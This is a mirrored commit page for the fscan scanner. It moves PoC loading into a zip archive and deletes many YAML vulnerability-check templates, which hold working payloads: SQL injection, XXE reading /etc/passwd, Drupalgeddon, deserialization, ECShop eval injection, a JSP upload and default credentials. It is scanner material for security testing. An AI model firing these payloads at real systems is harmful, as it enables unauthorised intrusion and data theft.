mirrors/fscan
1
0
Fork 0
mirror of https://github.com/shadow1ng/fscan.git synced 2025-09-14 14:06:44 +08:00
Code Issues Actions Packages Projects Releases Wiki Activity

修改pocs加载为zip压缩包

Browse Source
This commit is contained in:
LAPTOP-VVINFKMQ\JohnDoe 2021-07-26 11:15:39 +08:00
parent dc949e25b1
commit 7095bd20be
151 changed files with 169 additions and 2412 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

57
WebScan/lib/http.pb.go
View File

@ -4,10 +4,14 @@
package lib
import (
"bytes"
"archive/zip"
"embed"
fmt "fmt"
proto "github.com/golang/protobuf/proto"
"gopkg.in/yaml.v3"
"io/ioutil"
"log"
math "math"
"strings"
)
@ -393,7 +397,28 @@ func LoadMultiPoc(Pocs embed.FS, pocname string) []*Poc {
func loadPoc(fileName string, Pocs embed.FS) (*Poc, error) {
p := &Poc{}
yamlFile, err := Pocs.ReadFile("pocs/" + fileName)
zByte, err := Pocs.ReadFile("pocs/pocs.zip")
zipReader, err := zip.NewReader(bytes.NewReader(zByte), int64(len(zByte)))
if err != nil {
log.Fatal(err)
}
var unzippedFileBytes []byte
// Read all the files from zip archive
for _, zipFile := range zipReader.File {
if zipFile.Name == fileName {
unzippedFileBytes, err = readZipFile(zipFile)
if err != nil {
log.Println(err)
continue
}
break
}
}
yamlFile := unzippedFileBytes
//yamlFile, err := Pocs.ReadFile("pocs/" + fileName)
if err != nil {
return nil, err
@ -406,6 +431,23 @@ func loadPoc(fileName string, Pocs embed.FS) (*Poc, error) {
}
func SelectPoc(Pocs embed.FS, pocname string) []string {
zByte, err := Pocs.ReadFile("pocs/pocs.zip")
zipReader, err := zip.NewReader(bytes.NewReader(zByte), int64(len(zByte)))
if err != nil {
log.Fatal(err)
}
var foundFiles []string
// Read all the files from zip archive
for _, entry := range zipReader.File {
if strings.Contains(entry.Name, pocname){
foundFiles = append(foundFiles, entry.Name)
}
}
/*
entries, err := Pocs.ReadDir("pocs")
if err != nil {
fmt.Println(err)
@ -416,5 +458,18 @@ func SelectPoc(Pocs embed.FS, pocname string) []string {
foundFiles = append(foundFiles, entry.Name())
}
}
*/
return foundFiles
}
func readZipFile(zf *zip.File) ([]byte, error) {
f, err := zf.Open()
if err != nil {
return nil, err
}
defer f.Close()
return ioutil.ReadAll(f)
}

34
WebScan/pocs/activemq-cve-2016-3088.yml
View File

@ -1,34 +0,0 @@
name: poc-yaml-activemq-cve-2016-3088
set:
filename: randomLowercase(6)
fileContent: randomLowercase(6)
rules:
- method: PUT
path: /fileserver/{{filename}}.txt
body: |
{{fileContent}}
expression: |
response.status == 204
- method: GET
path: /admin/test/index.jsp
search: |
activemq.home=(?P<home>.*?),
follow_redirects: false
expression: |
response.status == 200
- method: MOVE
path: /fileserver/{{filename}}.txt
headers:
Destination: "file://{{home}}/webapps/api/{{filename}}.jsp"
follow_redirects: false
expression: |
response.status == 204
- method: GET
path: /api/{{filename}}.jsp
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(fileContent))
detail:
author: j4ckzh0u(https://github.com/j4ckzh0u)
links:
- https://github.com/vulhub/vulhub/tree/master/activemq/CVE-2016-3088

16
WebScan/pocs/activemq-default-password.yml
View File

@ -1,16 +0,0 @@
name: poc-yaml-activemq-default-password
rules:
- method: GET
path: /admin/
expression: |
response.status == 401 && response.body.bcontains(b"Unauthorized")
- method: GET
path: /admin/
headers:
Authorization: Basic YWRtaW46YWRtaW4=
expression: |
response.status == 200 && response.body.bcontains(b"Welcome to the Apache ActiveMQ Console of") && response.body.bcontains(b"<h2>Broker</h2>")
detail:
author: pa55w0rd(www.pa55w0rd.online/)
links:
- https://blog.csdn.net/ge00111/article/details/72765210

12
WebScan/pocs/alibaba-canal-info-leak.yml
View File

@ -1,12 +0,0 @@
name: poc-yaml-alibaba-canal-info-leak
rules:
- method: GET
path: /api/v1/canal/config/1/1
follow_redirects: false
expression: |
response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"ncanal.aliyun.accessKey") && response.body.bcontains(b"ncanal.aliyun.secretKey")
detail:
author: Aquilao(https://github.com/Aquilao)
info: alibaba Canal info leak
links:
- https://my.oschina.net/u/4581879/blog/4753320

15
WebScan/pocs/alibaba-nacos-api-unauth.yml
View File

@ -1,15 +0,0 @@
name: poc-yaml-alibaba-nacos-api-unauth
rules:
- method: GET
path: /nacos/v1/auth/users?pageNo=1&pageSize=9
headers:
User-Agent: Nacos-Server
follow_redirects: true
expression: |
response.content_type.contains("application/json") && response.body.bcontains(bytes("totalCount")) && response.body.bcontains(bytes("pagesAvailable")) && response.body.bcontains(bytes("username")) && response.body.bcontains(bytes("password"))
detail:
author: AgeloVito
info: alibaba-nacos-api-unauth
login: nacos/nacos
links:
- https://blog.csdn.net/caiqiiqi/article/details/112005424

13
WebScan/pocs/alibaba-nacos.yml
View File

@ -1,13 +0,0 @@
name: poc-yaml-alibaba-nacos
rules:
- method: GET
path: /nacos/
follow_redirects: true
expression: |
response.body.bcontains(bytes("<title>Nacos</title>"))
detail:
author: AgeloVito
info: alibaba-nacos
login: nacos/nacos
links:
- https://blog.csdn.net/caiqiiqi/article/details/112005424

38
WebScan/pocs/apache-flink-upload-rce.yml
View File

@ -1,38 +0,0 @@
name: poc-yaml-apache-flink-upload-rce
set:
r1: randomLowercase(8)
r2: randomLowercase(4)
rules:
- method: GET
path: /jars
follow_redirects: true
expression: >
response.status == 200 && response.content_type.contains("json") &&
response.body.bcontains(b"address") && response.body.bcontains(b"files")
- method: POST
path: /jars/upload
headers:
Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3
body: |-
--8ce4b16b22b58894aa86c421e8759df3
Content-Disposition: form-data; name="jarfile";filename="{{r2}}.jar"
Content-Type:application/octet-stream
{{r1}}
--8ce4b16b22b58894aa86c421e8759df3--
follow_redirects: true
expression: >
response.status == 200 && response.content_type.contains("json") &&
response.body.bcontains(b"success") && response.body.bcontains(bytes(r2))
search: >-
(?P<filen>([a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}_[a-z]{4}.jar))
- method: DELETE
path: '/jars/{{filen}}'
follow_redirects: true
expression: |
response.status == 200
detail:
author: timwhite
links:
- https://github.com/LandGrey/flink-unauth-rce

19
WebScan/pocs/apache-ofbiz-cve-2020-9496-xml-deserialization.yml
View File

@ -1,19 +0,0 @@
name: poc-yaml-apache-ofbiz-cve-2020-9496-xml-deserialization
set:
rand: randomInt(200000000, 210000000)
rules:
- method: POST
path: /webtools/control/xmlrpc
headers:
Content-Type: application/xml
body: >-
<?xml
version="1.0"?><methodCall><methodName>{{rand}}</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>
follow_redirects: false
expression: >
response.status == 200 && response.body.bcontains(bytes("methodResponse")) && response.body.bcontains(bytes("No such service [" + string(rand)))
detail:
author: su(https://suzzz112113.github.io/#blog)
links:
- https://lists.apache.org/thread.html/r84ccbfc67bfddd35dced494a1f1cba504f49ac60a2a2ae903c5492c3%40%3Cdev.ofbiz.apache.org%3E
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb

21
WebScan/pocs/apache-solr-file-read.yml
View File

@ -1,21 +0,0 @@
name: poc-yaml-apache-solr-file-read
rules:
- method: GET
path: "/solr/admin/cores?indexInfo=false&wt=json"
search: |
"name":"(?P<core_name>.+?)",
expression:
response.status == 200
- method: POST
path: "/solr/{{core_name}}/config"
headers:
Content-type: application/json
body: |
{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
expression: |
response.status == 200 && response.body.bcontains(b"This")
detail:
author: flyinbed
links:
- "https://mp.weixin.qq.com/s/iX2OasjynZ0MAvNTvIcmjg"
- "https://mp.weixin.qq.com/s/HMtAz6_unM1PrjfAzfwCUQ"

15
WebScan/pocs/apacheofbiz-cve-2018-8033-xxe.yml
View File

@ -1,15 +0,0 @@
name: poc-yaml-apacheofbiz-cve-2018-8033-xxe
rules:
- method: POST
path: /webtools/control/xmlrpc
headers:
Content-Type: application/xml
body: >-
<?xml version="1.0"?><!DOCTYPE x [<!ENTITY disclose SYSTEM "file://///etc/passwd">]><methodCall><methodName>&disclose;</methodName></methodCall>
follow_redirects: false
expression: >
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) && response.content_type.contains("text/xml")
detail:
author: su(https://suzzz112113.github.io/#blog)
links:
- https://github.com/jamieparfet/Apache-OFBiz-XXE/blob/master/exploit.py

11
WebScan/pocs/bt742-pma-unauthorized-access.yml
View File

@ -1,11 +0,0 @@
name: poc-yaml-bt742-pma-unauthorized-access
rules:
- method: GET
path: /pma/
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"information_schema") && response.body.bcontains(b"phpMyAdmin") && response.body.bcontains(b"server_sql.php")
detail:
author: Facker007(https://github.com/Facker007)
links:
- https://mp.weixin.qq.com/s/KgAaFRKarMdycYzETyKS8A

11
WebScan/pocs/cisco-cve-2020-3452-readfile.yml
View File

@ -1,11 +0,0 @@
name: poc-yaml-cisco-cve-2020-3452-readfile
rules:
- method: GET
path: /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
follow_redirects: false
expression: response.status == 200 && response.headers["Content-Type"] == "application/octet-stream" && response.body.bcontains(b"INTERNAL_PASSWORD_ENABLED")
detail:
author: JrD (https://github.com/JrDw0/)
links:
- https://nvd.nist.gov/vuln/detail/CVE-2020-3452
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86

12
WebScan/pocs/coremail-cnvd-2019-16798.yml
View File

@ -1,12 +0,0 @@
name: poc-yaml-coremail-cnvd-2019-16798
rules:
- method: GET
path: >-
/mailsms/s?func=ADMIN:appState&dumpConfig=/
follow_redirects: false
expression: >
response.status == 200 && response.body.bcontains(bytes("<object name=\"cm_md_db\">"))
detail:
author: cc_ci(https://github.com/cc8ci)
links:
- https://www.secpulse.com/archives/107611.html

22
WebScan/pocs/discuz-ml3x-cnvd-2019-22239.yml
View File

@ -1,22 +0,0 @@
name: poc-yaml-discuz-ml3x-cnvd-2019-22239
set:
r1: randomInt(800000000, 1000000000)
rules:
- method: GET
path: /forum.php
follow_redirects: false
expression: |
response.status == 200
search: cookiepre = '(?P<token>[\w_]+)'
- method: GET
path: /forum.php
headers:
Cookie: "{{token}}language=sc'.print(md5({{r1}})).'"
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(md5(string(r1))))
detail:
author: X.Yang
Discuz_version: Discuz!ML 3.x
links:
- https://www.cnvd.org.cn/flaw/show/CNVD-2019-22239

14
WebScan/pocs/dlink-cve-2019-17506.yml
View File

@ -1,14 +0,0 @@
name: poc-yaml-dlink-cve-2019-17506
rules:
- method: POST
path: /getcfg.php
headers:
Content-Type: application/x-www-form-urlencoded
body: SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
follow_redirects: false
expression: >
response.status == 200 && response.body.bcontains(b"<name>") && response.body.bcontains(b"<password>")
detail:
author: l1nk3r,Huasir(https://github.com/dahua966/)
links:
- https://xz.aliyun.com/t/6453

12
WebScan/pocs/dlink-cve-2020-25078-account-disclosure.yml
View File

@ -1,12 +0,0 @@
name: poc-yaml-dlink-cve-2020-25078-account-disclosure
rules:
- method: GET
path: >-
/config/getuser?index=0
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=") && response.headers["Content-Type"].contains("text/plain")
detail:
author: kzaopa(https://github.com/kzaopa)
links:
- https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg

15
WebScan/pocs/dlink-cve-2020-9376-dump-credentials.yml
View File

@ -1,15 +0,0 @@
name: poc-yaml-dlink-cve-2020-9376-dump-credentials
rules:
- method: POST
path: /getcfg.php
headers:
Content-Type: application/x-www-form-urlencoded
body: >-
SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1
expression: >
response.status == 200 && response.body.bcontains(b"<name>Admin</name>") && response.body.bcontains(b"</usrid>") && response.body.bcontains(b"</password>")
detail:
author: x1n9Qi8
Affected Version: "Dlink DIR-610"
links:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9376

9
WebScan/pocs/dlink-dcs-info-leak.yml
View File

@ -1,9 +0,0 @@
name: poc-yaml-dlink-dcs-info-leak
rules:
- method: GET
path: /config/getuser?index=0
expression: response.status == 200 && response.body.bcontains(b"name=") && response.body.bcontains(b"pass=") && response.body.bcontains(b"priv=")
detail:
author: jingling(https://github.com/shmilylty)
links:
- https://mp.weixin.qq.com/s/cG868wc7dmwxFslcwlgDpw

12
WebScan/pocs/docker-api-unauthorized-rce.yml
View File

@ -1,12 +0,0 @@
name: poc-yaml-docker-api-unauthorized-rce
rules:
- method: GET
path: /info
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"KernelVersion") && response.body.bcontains(b"RegistryConfig") && response.body.bcontains(b"DockerRootDir")
detail:
author: j4ckzh0u(https://github.com/j4ckzh0u)
links:
- https://github.com/vulhub/vulhub/tree/master/docker/unauthorized-rce

16
WebScan/pocs/docker-registry-api-unauth.yml
View File

@ -1,16 +0,0 @@
name: poc-yaml-docker-registry-api-unauth
rules:
- method: GET
path: /v2/
follow_redirects: false
expression: >
response.status == 200 && "docker-distribution-api-version" in response.headers && response.headers["docker-distribution-api-version"].contains("registry/2.0")
- method: GET
path: /v2/_catalog
follow_redirects: false
expression: >
response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"repositories")
detail:
author: p0wd3r
links:
- http://www.polaris-lab.com/index.php/archives/253/

10
WebScan/pocs/druid-monitor-unauth.yml
View File

@ -1,10 +0,0 @@
name: poc-yaml-druid-monitor-unauth
rules:
- method: GET
path: /druid/index.html
expression: |
response.status == 200 && response.body.bcontains(b"Druid Stat Index") && response.body.bcontains(b"DruidVersion") && response.body.bcontains(b"DruidDrivers")
detail:
author: met7or
links:
- https://github.com/alibaba/druid

14
WebScan/pocs/drupal-cve-2014-3704-sqli.yml
View File

@ -1,14 +0,0 @@
name: poc-yaml-drupal-cve-2014-3704-sqli
rules:
- method: POST
path: /?q=node&destination=node
body: >-
pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or
updatexml(0x23,concat(1,md5(666)),1)%23]=bob&name[0]=a
follow_redirects: false
expression: |
response.status == 500 && response.body.bcontains(b"PDOException") && response.body.bcontains(b"fae0b27c451c728867a567e8c1bb4e53")
detail:
Affected Version: "Drupal < 7.32"
links:
- https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2014-3704

19
WebScan/pocs/drupal-cve-2018-7600-rce.yml
View File

@ -1,19 +0,0 @@
name: poc-yaml-drupal-cve-2018-7600-rce
set:
r1: randomLowercase(4)
r2: randomLowercase(4)
rules:
- method: POST
path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}}
expression: |
response.body.bcontains(bytes(r1 + "%" + r2))
detail:
links:
- https://github.com/dreadlocked/Drupalgeddon2
- https://paper.seebug.org/567/
test:
target: http://cve-2018-7600-8-x.vulnet:8080/

29
WebScan/pocs/drupal-cve-2018-7600-rce2.yml
View File

@ -1,29 +0,0 @@
name: poc-yaml-drupal-cve-2018-7600-rce
set:
r1: randomLowercase(4)
r2: randomLowercase(4)
rules:
- method: POST
path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password
search: |
name="form_build_id"\s+value="(?P<build_id>.+?)"
expression: |
response.status == 200
- method: POST
path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_build_id={{build_id}}
expression: |
response.body.bcontains(bytes(r1 + "%" + r2))
detail:
links:
- https://github.com/dreadlocked/Drupalgeddon2
- https://paper.seebug.org/567/
test:
target: http://cve-2018-7600-8-x.vulnet:8080/

33
WebScan/pocs/drupal-cve-2019-6340.yml
View File

@ -1,33 +0,0 @@
name: poc-yaml-drupal-cve-2019-6340
set:
host: request.url.host
r1: randomLowercase(4)
r2: randomLowercase(4)
rules:
- method: POST
path: /node/?_format=hal_json
headers:
Content-Type: application/hal+json
Accept: '*/*'
body: |
{
"link": [
{
"value": "link",
"options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:10:\"{{r1}}%%{{r2}}\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"printf\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
}
],
"_links": {
"type": {
"href": "http://{{host}}/rest/type/shortcut/default"
}
}
}
follow_redirects: true
expression: |
response.status == 403 && response.body.bcontains(bytes(r1 + "%" + r2))
detail:
author: thatqier
links:
- https://github.com/jas502n/CVE-2019-6340
- https://github.com/knqyf263/CVE-2019-6340

28
WebScan/pocs/drupal-drupal7geddon2-rce.yml
View File

@ -1,28 +0,0 @@
name: poc-yaml-drupal-drupalgeddon2-rce # nolint[:namematch]
set:
r1: randomLowercase(4)
r2: randomLowercase(4)
rules:
- method: POST
path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password
search: |
name="form_build_id"\s+value="(?P<build_id>.+?)"
expression: |
response.status == 200
- method: POST
path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_build_id={{build_id}}
expression: |
response.body.bcontains(bytes(r1 + "%" + r2))
detail:
drupal_version: 7
links:
- https://github.com/dreadlocked/Drupalgeddon2
- https://paper.seebug.org/567/

20
WebScan/pocs/drupal-drupal8geddon2-rce.yml
View File

@ -1,20 +0,0 @@
name: poc-yaml-drupal-drupalgeddon2-rce # nolint[:namematch]
set:
r1: randomLowercase(4)
r2: randomLowercase(4)
rules:
- method: POST
path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}}
expression: |
response.body.bcontains(bytes(r1 + "%" + r2))
detail:
drupal_version: 8
links:
- https://github.com/dreadlocked/Drupalgeddon2
- https://paper.seebug.org/567/
test:
target: http://cve-2018-7600-8-x.vulnet:8080/

13
WebScan/pocs/ecology-sqli.yml
View File

@ -1,13 +0,0 @@
name: poc-yaml-ecology-sqli
set:
rand: randomInt(200000000, 210000000)
rules:
- method: GET
path: /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20md5({{rand}})%20as%20id%20from%20HrmResourceManager
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
detail:
author: whami-root(https://github.com/whami-root)
links:
- https://github.com/whami-root

17
WebScan/pocs/ecology-validate-sqli.yml
View File

@ -1,17 +0,0 @@
name: poc-yaml-ecology-validate-sqli
set:
r1: randomInt(8000, 9999)
r2: randomInt(800, 1000)
rules:
- method: POST
path: /cpt/manage/validate.jsp?sourcestring=validateNum
body: >-
sourcestring=validateNum&capitalid=11%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion+select+str({{r1}}*{{r2}})&capitalnum=-10
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: fuping
links:
- https://news.ssssafe.com/archives/3325
- https://www.weaver.com.cn/cs/securityDownload.asp

20
WebScan/pocs/ecology-workflowservicexml-2.yml
View File

File diff suppressed because one or more lines are too long

20
WebScan/pocs/ecology-workflowservicexml.yml
View File

File diff suppressed because one or more lines are too long

13
WebScan/pocs/ecshop-cnvd-2020-58823-sqli.yml
View File

@ -1,13 +0,0 @@
name: poc-yaml-ecshop-cnvd-2020-58823-sqli
set:
r1: randomInt(40000, 44800)
rules:
- method: POST
path: /delete_cart_goods.php
body: id=0||(updatexml(1,concat(0x7e,(select%20md5({{r1}})),0x7e),1))
expression: |
response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31)))
detail:
author: 凉风(http://webkiller.cn/)
links:
- https://mp.weixin.qq.com/s/1t0uglZNoZERMQpXVVjIPw

17
WebScan/pocs/ecshop-rce.yml
View File

@ -1,17 +0,0 @@
name: poc-yaml-ecshop-rce
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
- method: POST
path: /user.php
headers:
Referer: >-
554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
Content-Type: application/x-www-form-urlencoded
body: action=login&pp123=printf({{r1}}*{{r2}});
expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: 凉风(http://webkiller.cn/)
links:
- https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md

17
WebScan/pocs/ecshop-rce2.yml
View File

@ -1,17 +0,0 @@
name: poc-yaml-ecshop-rce
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
- method: POST
path: /user.php
headers:
Referer: >-
45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953aads
Content-Type: application/x-www-form-urlencoded
body: action=login&pp123=printf({{r1}}*{{r2}});
expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: 凉风(http://webkiller.cn/)
links:
- https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md

16
WebScan/pocs/elasticsearch-unauth.yml
View File

@ -1,16 +0,0 @@
name: poc-yaml-elasticsearch-unauth
rules:
- method: GET
path: /
follow_redirects: false
expression: |
response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"You Know, for Search")
- method: GET
path: /_cat
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"/_cat/master")
detail:
author: p0wd3r
links:
- https://yq.aliyun.com/articles/616757

14
WebScan/pocs/exchange-cve-2021-26855-ssrf.yml
View File

@ -1,14 +0,0 @@
name: poc-yaml-exchange-cve-2021-26855-ssrf
rules:
- method: GET
path: /owa/auth/x.js
headers:
Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
follow_redirects: false
expression: |
"X-CalculatedBETarget" in response.headers && response.headers["X-CalculatedBETarget"].icontains("localhost")
detail:
author: sharecast
Affected Version: "Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010"
links:
- https://github.com/microsoft/CSS-Exchange/blob/main/Security/http-vuln-cve2021-26855.nse

15
WebScan/pocs/eyou-rce.yml
View File

@ -1,15 +0,0 @@
name: poc-yaml-eyou-rce
set:
r1: randomInt(800000000, 1000000000)
r2: randomInt(800000000, 1000000000)
rules:
- method: POST
path: /webadm/?q=moni_detail.do&action=gragh
headers:
Content-Type: application/x-www-form-urlencoded
body: type='|expr {{r1}} + {{r2}}||'
expression: response.body.bcontains(bytes(string(r1 + r2)))
detail:
author: jingling(https://github.com/shmilylty)
links:
- https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g

16
WebScan/pocs/f5-tmui-cve-2020-5902-rce.yml
View File

@ -1,16 +0,0 @@
name: poc-yaml-f5-tmui-cve-2020-5902-rce
rules:
- method: POST
path: >-
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp
headers:
Content-Type: application/x-www-form-urlencoded
body: fileName=%2Fetc%2Ff5-release
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(b"BIG-IP release")
detail:
author: Jing Ling
links:
- https://support.f5.com/csp/article/K52145254
- https://github.com/rapid7/metasploit-framework/pull/13807/files

13
